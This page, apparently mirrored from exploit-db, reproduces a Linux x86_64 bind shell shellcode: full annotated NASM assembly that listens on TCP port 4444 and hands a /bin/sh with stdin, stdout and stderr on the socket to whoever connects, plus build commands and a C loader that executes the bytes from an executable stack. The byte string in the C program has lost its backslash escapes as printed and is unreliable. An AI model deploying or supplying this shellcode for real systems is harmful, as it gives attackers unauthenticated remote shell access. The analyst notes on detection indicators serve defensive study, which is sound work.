Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes) – DigitalMunition







Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  131 bytes
;github = https://github.com/STARRBOY	
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"


================== ASSEMBLY ========================================


global _start


section .text

;-----------------------------------------------------------------------
; _start — Linux/x86_64 bind shell (NASM, Intel syntax, raw syscalls,
; no libc). Executed top to bottom; the labels are fall-through
; sections, not callable functions, and nothing is ever returned.
;
; Behaviour, in order: socket(AF_INET, SOCK_STREAM, 0) -> bind(*:4444)
; -> listen(backlog 1) -> accept() -> close(listening fd) -> dup2 the
; accepted fd onto 2, 1, 0 -> execve("/bin//sh", NULL, NULL).
; No syscall result is checked; the final execve replaces the process.
;
; Register roles: rdi = listening socket fd after create_socket, then
; the client fd after the xchg that follows close; r10 briefly holds
; the client fd; rsp points at the 16-byte sockaddr_in built on the
; stack and reused as accept()'s address buffer.
; Constants are loaded with push/pop, inc/dec, xor and add al —
; presumably to keep every instruction free of 0x00 bytes (the byte
; dump later on this page contains none).
;
; Analyst note: the syscall sequence above (socket/bind/listen/accept,
; then close, three dup2 calls and an execve of "/bin//sh" with stdin,
; stdout and stderr all pointing at a socket) is the observable
; behaviour to alert on; the doubled slash in "/bin//sh" only pads the
; path to 8 bytes and is a usable static indicator together with the
; byte pattern listed below.
;-----------------------------------------------------------------------
_start:
		
	
	xor rsi,	rsi	;rsi = 0 here; rax and rdi are loaded by push/pop in create_socket,
				;so they are not zeroed separately

create_socket:
	
	;int socket(int domain, int type, int protocol);
	push 41			;rax = 41 = sys_socket
	pop rax
	push 2
	pop rdi			;rdi = 2 = AF_INET
	inc rsi			;rsi = 1 = SOCK_STREAM
	xor rdx,	rdx	;rdx = 0 = protocol (default for the type)
	syscall

	;save the return value for future use
	xchg rdi, rax		;rdi = listening socket fd (rax now holds the old rdi, i.e. 2)

	
	; Build struct sockaddr_in (16 bytes) on the stack, lowest address first:
	; sin_family:      AF_INET = 2        (byte at [rsp]; the field is 16-bit, its
	;                                      high byte stays 0 from the push)
	; sin_port:        4444               (word at [rsp+2]; the immediate 0x5c11 is
	;                                      stored little-endian as bytes 11 5c, which
	;                                      is 0x115c = 4444 in network byte order)
	; sin_addr.s_addr: INADDR_ANY = 0     (listens on every interface)
	; sin_zero:        0
	xor rax, rax
	push rax			; upper 8 bytes of the struct (sin_zero) = 0
	push rax			; lower 8 bytes (family, port, addr) = 0 for now
	mov word [rsp+2], 0x5c11	; sin_port = htons(4444)
	mov byte [rsp], 0x2		; sin_family = AF_INET

bind:
	;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
	xor 	rdx,	rdx	
	push 	49		;rax = 49 = sys_bind; rdi is still the listening fd
	pop 	rax
	push	rsp	
	pop 	rsi		;rsi = &sockaddr_in built above
	add	rdx,	16	;rdx = sizeof(struct sockaddr_in) = 16
	syscall


listen:
	;int listen(int sockfd, int backlog);
	xor     rsi,	rsi
	push 	50		;rax = 50 = sys_listen
	pop 	rax
	inc 	rsi		;rsi = 1 = backlog (one pending connection)
	syscall

	
accept:
	;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
	push 	43 		;rax = 43 = sys_accept; blocks until a peer connects
	pop 	rax
	mov rsi, rsp		; rsi = addr: the sockaddr_in buffer is reused for the peer address
	mov byte [rsp-1], 0x10	; one byte holding 16 just below the struct
	dec rsp			; rsp now points at that byte
	mov rdx, rsp		; rdx = addrlen pointer. NOTE(review): only one byte was written
				; but socklen_t is 4 bytes, so the value read also includes the
				; struct's first three bytes; presumably relies on the kernel
				; clamping addrlen to the real struct size — confirm
	syscall

	;save client socket 
	xchg r10,	 rax	; r10 = accepted (client) fd; rax now holds the old r10 value

	
close:
	;int close(int fd);
	push	3		;rax = 3 = sys_close; rdi is still the listening fd, so that is what is closed
	pop 	rax
	push	rax		;keep the value 3 on the stack: it becomes the dup2 loop counter (rsi)
	syscall


	xchg    rdi,	r10	;rdi = client fd (first argument of dup2)
	pop 	rsi		;rsi = 3; decremented to 2, 1, 0 below
	
dup2loop:
	
	;int dup2(int oldfd, int newfd);  executed for newfd = 2, 1, 0 (stderr, stdout, stdin)
	push	33		;rax = 33 = sys_dup2 (reloaded every pass: syscall overwrites rax)
	pop	rax
	dec 	rsi		;newfd = rsi - 1; ZF is set when it reaches 0
	syscall
	loopnz  dup2loop	;repeat while rcx != 0 and ZF == 0, i.e. until newfd was 0.
				;NOTE(review): rcx is never set by this code; after syscall it holds
				;the return address (non-zero), so termination rests on ZF from
				;dec rsi surviving the syscall — confirm
	

spawn_shell:
	
	;int execve(const char *filename, char *const argv[], char *const envp[]);
	xor eax,	eax
	add al,		59			;rax = 59 = sys_execve (an 8-bit add presumably avoids 0x00 bytes in the immediate)
	xor rdi,	rdi			;rdi = 0
	push rdi				;8 zero bytes: NUL terminator for the path string
	mov rdi,	0x68732F2f6e69622F	;"/bin//sh" as a little-endian qword (bytes 2f 62 69 6e 2f 2f 73 68)
	push rdi				;path now at [rsp], terminated by the zeros pushed before it
	mov rdi,	rsp			;filename = rsp
	xor rsi,	rsi			;argv = NULL
	xor rdx,	rdx			;envp = NULL
	syscall					;on success the process image is replaced by /bin//sh with fds 0-2 on the client socket



=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o 
ld tcp_bind.o -o tcp_bind


=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind


======================C program=====================================

#include 
#include 

/* Raw bytes of the assembled _start above as a C string: 131 bytes
 * (13 per line, 14 on the last) with no 0x00 byte, so strlen() in main
 * reports the full length.
 * NOTE(review): as printed on this page every "\x" escape has lost its
 * backslash, so the literal below is a run of ASCII 'x48x31...' text
 * rather than the bytes it is meant to encode; the exploit-db link at
 * the bottom of the page carries the original listing. */
unsigned char shellcode[]=
        "x48x31xf6x6ax29x58x6ax02x5fx48xffxc6x48"
        "x31xd2x0fx05x48x97x48x31xc0x50x50x66xc7"
        "x44x24x02x11x5cxc6x04x24x02x48x31xd2x6a"
        "x31x58x54x5ex48x83xc2x10x0fx05x48x31xf6"
        "x6ax32x58x48xffxc6x0fx05x6ax2bx58x48x89"
        "xe6xc6x44x24xffx10x48xffxccx48x89xe2x0f"
        "x05x49x92x6ax03x58x50x0fx05x49x87xfax5e"
        "x6ax21x58x48xffxcex0fx05xe0xf6x31xc0x04"
        "x3bx48x31xffx57x48xbfx2fx62x69x6ex2fx2f"
        "x73x68x57x48x89xe7x48x31xf6x48x31xd2x0fx05";

/* Test loader: prints the strlen()-measured length of the buffer, then
 * calls into it by casting the data array to a function pointer.
 * That call only works if the array's pages are executable; the build
 * line on this page passes -z execstack, presumably for that reason —
 * whether it still has that effect depends on the toolchain and kernel.
 * On a default (NX) build the call faults instead.
 * Returns: nothing meaningful — on success the shellcode's execve
 * replaces the process and ret() never returns. */
int main(){

        /* NOTE(review): "%dn" — the newline escape appears to have lost its backslash in extraction */
        printf("length of your shellcode is: %dn", (int)strlen(shellcode));

        int (*ret)() = (int(*)())shellcode;   /* function pointer over the data buffer */

        ret();                                /* transfers control into the buffer */
}
            

https://www.exploit-db.com/exploits/46975






